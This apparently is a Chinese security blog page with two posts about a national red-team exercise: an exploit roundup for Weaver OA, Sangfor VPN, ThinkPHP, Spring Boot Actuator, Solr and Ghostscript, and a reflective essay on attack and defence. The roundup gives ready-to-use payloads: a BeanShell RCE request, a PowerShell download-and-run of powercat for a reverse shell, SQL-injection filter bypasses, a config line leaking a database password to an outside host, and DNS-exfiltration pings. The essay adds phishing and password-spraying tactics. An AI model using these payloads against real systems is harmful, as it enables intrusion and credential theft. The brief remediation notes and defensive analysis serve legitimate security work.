      一年一度的护网马上要开始了,结合网上已公布的POC,总结了一部分最新的漏洞利用及修复方式,供大家参考。 1 泛微OA Bsh 远程代码执行漏洞 1. 漏洞简介 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重. 2. 影响组件泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/215218.html https://github.com/beanshell/beanshell http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI 6. 漏洞利用 Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204 POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: xxxxxxxx:8088 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 7. 利用技巧 1.其他形式绕过 eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir"); 2.泛微多数都是windows环境, 反弹shell可以使用pcat Powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd 8. 防护方法 1.及时更新泛微补丁 2.拦截/weaver/bsh.servlet.BshServlet目录的访问 2 泛微OA e-cology SQL注入漏洞 1. 漏洞简介 泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转 2. 影响组件 泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData /mobile/plugin/SyncUserInfo.jsp 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区 https://xz.aliyun.com/t/6531 6. 漏洞利用 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客 https://blog.csdn.net/zycdn/article/details/102494037 Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py 应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园 https://www.cnblogs.com/AtesetEnginner/p/11558469.html /mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述 7. 利用技巧 1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了 2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了 3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测 4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格) "-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'" 老版本可以在关键字后面加 /**/ 来绕过sql检测 新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表 就Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。 8. 防护方法 1.及时更新泛微补丁 2.泛微最好不要开放到公网 3.使用waf拦击 3 深信服VPN远程代码执行 1. 漏洞简介 深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过 2. 影响组件深信服 VPN 3. 漏洞指纹 Set-Cookie: TWFID=welcome to ssl vpn Sinfor 4. Fofa Dork header="Set-Cookie: TWFID=" 5. 漏洞分析 深信服vpnweb登录逆向学习 – potatso – 博客园 https://www.cnblogs.com/potatsoSec/p/12326356.html 6. 漏洞利用 wget -t %d -T %d --spider %s 7. 利用技巧 1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网 2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来 3.去除空格也简单 cat /etc/passwd | tr " \n" "+|" 8. 防护方法 1.及时更新补丁 2.升级到最新版 4 深信服 VPN 口令爆破 1. 漏洞简介 深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行 2. 影响组件深信服 VPN 3. 漏洞指纹 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd= 4. Fofa Dork app="深信服-SSL-VPN" 5. 漏洞分析 关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区 https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633 此处存疑, 时间问题没有测试 6. 漏洞利用 1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多) #encoding=utf8 import requests import hashlib import urllib3 urllib3.disable_warnings() import re session = requests.session() def SanForLogin(target, password, username="admin"):     # 加密密码的算法是 sha1(password+sid)     # 没有公开POC就不写了 SanForLogin("https://xxxxxxxxxxx/", "admin") 7. 利用技巧 1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多 国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid) 爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123 2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能 3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell https://www.uedbox.com/post/31092/ 8. 防护方法 1.及时更新补丁 2.升级到最新版 5 边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞 1. 漏洞简介 大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主 2. 影响组件 防火墙, 网关, 路由器, VPN 3. 漏洞指纹 防火墙, 网关, 路由器, VPN 4. Fofa Dork防火墙, 网关, 路由器, VPN 的名称 5. 漏洞分析 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 6. 漏洞利用 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 7. 利用技巧 1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令 admin root 123456 永远的神 内网的安全平台就是个漏洞指南 8. 防护方法 1.设置强口令 2.限制来源IP 6 Thinkphp 相关漏洞 1. 漏洞简介 Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题 2. 影响组件 Thinkphp 3. 漏洞指纹 Thinkphp X-Powered-By: ThinkPHP 4. Fofa Dork app="ThinkPHP" 5. 漏洞分析 ThinkPHP漏洞总结 – 赛克社区 http://zone.secevery.com/article/1165 挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心 https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/ ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客 https://blog.csdn.net/Fly_hps/article/details/81201904 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 6. 漏洞利用 SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写 https://github.com/Dido1960/thinkphp whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具 https://github.com/whirlwind110/tphack 7. 利用技巧 1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露 2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中 3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 8. 防护方法 1.及时更新补丁 2.升级到最新版Thinkphp 3.前置WAF进行防护 7 Spring 系列漏洞 1. 漏洞简介 Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒 2. 影响组件 Spring xxx 3. 漏洞指纹 X-Application-Context: 4. Fofa Dork app="Spring-Framework" 5. 漏洞分析 Spring 框架漏洞集合 ~ Misaki’s Blog https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/ Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ 6. 漏洞利用 mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE https://github.com/mpgn/Spring-Boot-Actuator-Exploit artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads https://github.com/artsploit/yaml-payload 7. 利用技巧 1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下 /trace /health /loggers /metrics /autoconfig /heapdump /threaddump /env /info /dump /configprops /mappings /auditevents /beans /jolokia /cloudfoundryapplication /hystrix.stream /actuator /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream /monitor /monitor/auditevents /monitor/beans /monitor/health /monitor/conditions /monitor/configprops /monitor/env /monitor/info /monitor/loggers /monitor/heapdump /monitor/threaddump /monitor/metrics /monitor/scheduledtasks /monitor/httptrace /monitor/mappings /monitor/jolokia /monitor/hystrix.stream 这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。 2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了 8. 防护方法 1.及时更新补丁 2.开启Spring Boot Actuators权限校验 3.前置WAF进行防护 8 Solr 系列漏洞 1. 漏洞简介 Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞, 2. 影响组件 Solr 3. 漏洞指纹 Solr 4. Fofa Dork app="Solr" 5. 漏洞分析 Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/218730.html Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析 https://paper.seebug.org/1009/ 6. 漏洞利用 veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”) https://github.com/jas502n/CVE-2019-12409 mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet 7. 利用技巧 1.看到锤就完事了, 漏洞太多了, 一片一片的 2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作 8. 防护方法 1.升级到最新版 2.不要对外开放敏感端口 9 Ghostscript 上传图片代码执行 1. 漏洞简介 Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招 2. 影响组件 imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用 3. 漏洞指纹 .ps/.jpg/.png 4. Fofa Dork 5. 漏洞分析 ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台 https://www.anquanke.com/post/id/157513 6. 漏洞利用 Exploit Database Search https://www.exploit-db.com/search?q=Ghostscript vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116 7. 利用技巧 1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping `uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的 8. 防护方法 1.升级到最新版 ...

    2020-06-19 2239
  • 2020护网参考学习 关于护网行动的总结

    截止到28日5点,护网行动终于结束,朋友圈感觉是在过年,到处是倒计时和庆祝声。看来防守方们7*24小时的看监控还是比较无奈的。本次复盘基于我对整个护网行动的观察总结而来,仅代表我个人观点,如有不妥之处,欢迎交流。 1. 整体攻防的思考   本次攻防,从规则到各方实力,都是绝无仅有的。经常有人问,是攻击队厉害还是防守队厉害?经过我这些年的思考,还是没有得出一个确切的结论。有时候觉得攻击队厉害,因为攻击可以在非特定时间随意发起,出其不意攻其不备,甚至手持0day指哪打哪,毕竟木桶原理决定着攻破一处即可内部突袭;有时候又觉得防守方厉害,因为防守方拥有全部访问流量,随时洞察攻击者的探测并封堵IP,也可以在主机层监控攻击者一举一动,甚至部署蜜罐玩弄黑客于鼓掌之中。总之,这么些年的摸爬滚打经验告诉我,攻防就是这样,道高一尺魔高一丈,一如黑客防线中说的“在攻于防的对立统一中寻求突破”。   2. 从攻击方思考   在真实的攻击行动中,一般一个目标要搞到核心系统根据防御程度不同,也需要1个月到半年的样子,甚至APT要潜伏一到两年才能拿到自己想要的数据。而此次总共给攻击方的时间只有3个周,并且每个队伍据说10多个目标,这也就决定了攻击要快速、要自动化。   a) 分布式扫描器   要说快速,还是得上扫描器,但是一个扫描器速度肯定不行,再者,被发现攻击行为,立马IP被ban掉,后续就无法进行。所以,分布式扫描器在这种情况下一定是个趋势。首先对全部目标的全端口进行一次扫描+端口识别,根据Banner快速收割一轮;   在这个过程中就会有个陷阱,比如在收集二级域名时,经常采用字典爆破,而防守方会设置一个诱饵二级域名,把流量引入蜜罐之中,坐等攻击方上钩。这时就需要攻击方们机灵一点,时刻反思这个是不是蜜罐。   对于AWVS的扫描器,还需升级到最新版,别被防御方反制,毕竟老版本扫描器自身就存在一个RCE。   b) 菜刀?蚁剑?冰蝎?   对于所有的黑客来说,菜刀肯定是一个传奇,一直是最稳定、最牛逼的webshell管理工具之一,但同时,菜刀也是一个最容易被发现的攻击工具,毕竟流量特征太明显了,而且一旦发现就100%意味着服务器已沦陷,防守方会里面下线进行深入分析。记得当初第一次见到菜刀这工具时的感觉,总结起来就是“厉害”。因为在菜刀之前,我们学习的都是先小马后大马的姿势。而用了菜刀之后,我深刻理解了什么大马小马都无所谓,能执行命令搞定目标的都是好马。然后经过了几年的迭代,中国菜刀在国内安全圈也是经历了各种风风雨雨,各种后门版满天飞。最后鉴于其加密性能较弱,陆续出现了几个替代版本,蚁剑就是很优秀的一个项目。讲真,我开发水平相对较弱,见到蚁剑才发现原来js也可以写出优秀的跨平台客户端应用。可是正式由于其nodejs写的,才导致其跟AWVS一样,存在一个本地nodejs解析的RCE,很可能被防御方反制。再之后给我“厉害”感觉的就是冰蝎了,其双向通信加解密的管理方式,让诸多基于黑名单正则的防御产品厂商直接歇菜。可是很奇怪的时,还是有很多大量攻击方采用菜刀、jspspy之类的原始webshell,结果被防御方轻松发现并清除。   不过说到最后,我有一个疑惑,为什么大家非得用webshell这种方式搞服务器呢?比如存在weblogic反序列化或者Struts2 RCE漏洞时,黑客们写的工具还是一键写入webshell这种。安全发展到今天,防御手段越来越多,各位白帽子是时候改变了。正如我之前说的,不管用什么shell工具,只要能在服务器端执行命令,下面就肯定有更好的解决方案。我一般会使用命令方式加载自己的二进制版远控来操作。现在的二进制远控不像以前还要生成exe用菜刀上传,在命令行下执行,现在基本都可以做到类似mshta或者powershell的一句话直接动态上线,并且基于TCP/UDP协议的命令执行、文件管理。这样的好处:一是稳定,二是完全绕过那些基于黑名单的流量分析设备。类似metasploit的脚本payload反弹的meterpreter,但是msf特征明显,也容易被杀,所以我个人估计后面攻防还是会发展到类似cobalt strike之类的工具对抗上。   c) 水坑&鱼叉   针对水坑或者鱼叉攻击来讲,可以想象到肯定大量的攻击队伍采用这种方法进行攻击,攻击手法多基于邮件进行。现在假想成攻击队伍,我会首先在github上搜索一波,举个例子:https://github.com/search?q="4dogs.cn"+password&type=Code,注意域名要加上双引号进行精准匹配。在翻到一个可登陆的邮箱后,去通信录导出所有联系人方式,进而进行简单的口令爆破;在这些操作还没拿到有用密码的情况下,就可以根据组织结构进行定点攻击了。高级点的用浏览器0day,没有0day的也可以直接发宏病毒,注意要编个理由并且加密发送,防止被沙箱抓样本。   假如没有有用的邮箱账号,也可以用搜索引擎收集邮箱,再根据规则,加载中国姓名top500字典进行组合,总归能抓到一两个用弱口令的。   如果还是什么都没有,也可以使用swaks一类直接伪造成admin发送钓鱼邮件。   对于防御方来讲,最厉害的莫过于直接关停外网邮箱了。次之,可以派人随时查看登录日志,及时发现异地登录爆破情况。对于有钱的甲方,可以通过流量镜像,对附件进行沙箱判定。   d) 内网渗透,还是要了解业务   在突破边界进入内网后,剩下的主要是内网渗透了。内网渗透可以简单分为横向渗透和纵向渗透。内网渗透的实质和关键是信息收集,通过不停的突破系统拿到更多的权限,而更多的权限带来更多的信息,最终在信息和权限的螺旋迭代下,拿到目标的最高权限。   对于有域的环境,一般目标时拿下域控,而在本次攻击中却恰好爆发了一个直接打域控的0day,这就容易多了。但是即使一键拿下域控权限,还是要回到信息收集的本质上,要在海量的终端里筛选出自己的目标数据在哪台机器里,还是需要一些技巧的。   而不管是什么环境,我个人感觉阻碍攻击队伍进行内网渗透的主要原因还是对目标业务的了解程度。比如电力行业的16字方针,很多时候搞到边界系统后,ipconfig一看是10段的,以为进了个大内网,而实际情况是那只是冰山一角而已。纵向突破还有很长很长的路要走。再者,假如对电信行业、金融行业不了解,进到内网肯定也是一脸懵。这也是内网渗透耗费精力的原因。   e) 0day的优劣势   在本次演习中,陆续发现了大量的0day,印象里有七八个,0day具体细节可以参考各大公众号之前的报到。这里只讨论下针对0day的问题。   从0day的内容和数量上来讲,护网结束后我感觉什么系统都有漏洞,并且有一种想去挖几个留着的冲动,奈何工作杂事太多,先搁置一下吧。   对于攻击方来讲,手握0day是指哪打哪的一个有效支撑。从漏洞类型上,基本覆盖web、网络、操作系统等等方面。针对国内的网络安全现状,讲真,我对那些商业应用真的不报任何安全的奢望。对于国企和政府来讲,自有系统大都是外包厂商开发,而这些外包开发者,大部分不懂安全,甚至sql注入是啥都不知道,更别说防御框架漏洞了。所以对于攻击者来讲,去攻击一个客户广泛的厂商,拿到一个0day即可攻下其相关的所有目标,收益非常高。但同时也要明白,现在0day的生存期非常之短。10年前,我们一个0day可以用半年都没被人发现,而在这次演习中,0day的生存期可能只有半个小时,因为防守方发现shell就会溯源,进而预警。不过排除这次防守方7*24小时的有效监控,在真实情况下,0day的生存周期可能不超过一周。所以我认为,当前网络环境中,0day大量存在,但使用非常谨慎。至于防守方怎么防御0day,请看后面的内容。   3. 从防守方考虑   整体来讲,防守方都是从“事前排查”、“事中监控”、“事后溯源”三个方面进行防御的。根据我的观察,国企安全防御能力一般弱于互联网公司;而国企和政府单位的投入普遍高于互联网公司。导致了演习前大量的“人贩子”到处求人驻场的问题,一度炒到每人每天上万元。下面从几个方面分析这次防守方的经验和教训。   a) 防御过度问题   这次演习的意义和重要性,甲方自己应该更明白,这里不再描述。而正是由于防御方的重视,出现了大量的防御过度现象:一是在开始前的大量系统关停,二是对于互联网IP的大量封禁。大量的关停本质上是掩耳盗铃,在护网结束后依旧面临各类外部攻击者的威胁。希望存在这类情况的厂商,还是能从根源上排查漏洞,加固系统,对系统采取必要的防护措施。   针对恶意封禁IP的情况,虽然体现了防守方及时发现攻击的能力,但同时,也影响了正常业务的运行,特别是一封一个B段的情况。各位甲方还是考虑下从根源解决问题。   b) 应急排查   对于事前的应急排查,甲方大都采用临时购买人工渗透服务的方式进行,毫不客气地说,他们买到的一部分是在校大学生,或者培训机构的实习生。即使钱给够了,去的是个渗透大师,也会因为内网漏洞太多,无法完全覆盖。举个例子:假如给我一个系统,我大概需要一上午分析每个端口,每个业务接口的安全性,进而给出一个完整的测试报告。我基本上可以保证我测试过的系统短时间内不会出大问题。但是假如给我一个B段,告诉我3天完成,那我就只能模拟横向内网渗透,masscan先来一些端口,wvs扫描一轮,然后一批一批的去看。这种模式就决定了无法完全覆盖全部业务系统。即使时间够,那对于新增的业务又怎么办?   那针对这种情况该怎么办?我一直给我的客户普及的一个想法:内网漏洞不要指望短时间内购买一次服务就完全解决了。针对漏洞隐患的工作必须常态化开展:一是上资产管控手段,对内网所有的服务器,通过主动扫描、被动流量分析等手段进行搜集,实时监控内网到底开了多少端口,每个端口运行什么服务,应用是什么版本;二是解决遗留问题,对内网既有的框架漏洞、弱口令漏洞,进行专项整治。相信通过本次护网,原来没搞过安全的防守方,在部署安全设备后发现了大量的永恒之蓝、木马受控等遗留问题。建议大家用几周时间集中解决一类问题,循环下去即可解决遗留的全部问题;三是建立新业务上线审查流程,对于新上线的业务系统,必须通过第三方安全测评,只有拿到安全测评报告的才允许上线。   c) 重边界、轻内网的防御策略   这次的防守方普遍是重边界、轻内网防御,造成了一旦边界被破,内网整体垮掉的风险。而这个情况在我入行时就普遍存在。安全发展到今天,实在是说不过去。去年看到了Google提出的0信任网络,感觉是个趋势,一度想转行做0信任网络的布道者,虽然普及还有一段路,但是我还是希望大家可以转变思维,一定不要认为我在内网就是安全的。万一哪天被黑,可能影响的就是国家利益,带来的就是社会动荡。   d) 威胁情报系统的意义   首先,针对这次攻击,各种原有IOC情报基本无效,比如恶意域名库、恶意IP库等,因为攻击方使用的都是新的域名和IP,这也是黑名单做安全的尴尬。但是同时要感谢安全厂商们的威胁情报库,让更多的国企、政府单位认识到了自己内网办公电脑有很多已经被控制。   e) 面对0day攻击的无力感   面对0day攻击,理论上谁都扛不住,但是实际是这样么?仔细想想并非如此,首先,面对0day真正扛不住的是以黑名单为基础的安全设备,包括waf类、态势感知类、IDS类等。而这些安全设备,又确确实实是各大厂商的首选安全监控设备,一旦这些设备没报警,那基本啥都干不了,这也是防守方们7*24小时防守但其实大部分时间无所事事的原因。   首先,对于web 0day的防御,完全可以采用openrasp类防御方法,从根源上防止各类web漏洞攻击。如果有想购买商业版rasp方案的同学,可以勾兑下我哦。   其次,对于网络0day和系统0day,我们可以采用EDR手段进行防御,在终端上装上agent,在agent上采用白名单策略,对于无关的进程启动和危险命令直接报警或阻断。想起来我们四年前做过的一个产品叫麒麟卫士,可以说是国内首款EDR雏形了,可是去卖的时候发现大家对于需要安装agent的做法都耿耿于怀,不敢装。四年过去了,相信后面会有更多的人接受EDR带来的安全改变。   f) 蜜罐   这次演习的一大亮点就是很多防御方采用了蜜罐的方式进行诱捕和攻击引流。要说蜜罐做得好,那是真的很有用。我理想中的蜜罐应当是完全仿真,而不是动态针对部分服务的仿真。同时可以具备反制的功能,一是可溯源攻击者真实身份,二是可利用AWVS或者蚁剑这类黑客工具自己的漏洞反向攻击攻击者。相信后面会有大量的优秀产品脱颖而出。不过防守方真的真实部署后,可能半年也捕获不到一次有效攻击,毕竟这次是演习,平时黑客攻击还是少。不过安全就是如此,防患于未然。   写在最后:   我个人来讲是一个安全技术爱好者,从攻击到防御,都有涉猎。自从创业以来,干的事情更杂了,但是我一有时间还是在刷安全圈的技术文章,写一些poc。我是一个CEO、一个销售、一个售前、一个产品经理,同时,我也是一个“黑客”,期待着用我的所学所知,能为安全圈带来一些改变。“不忘初心,牢记使命”,与君共勉。 ...

    2020-06-19 26830

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注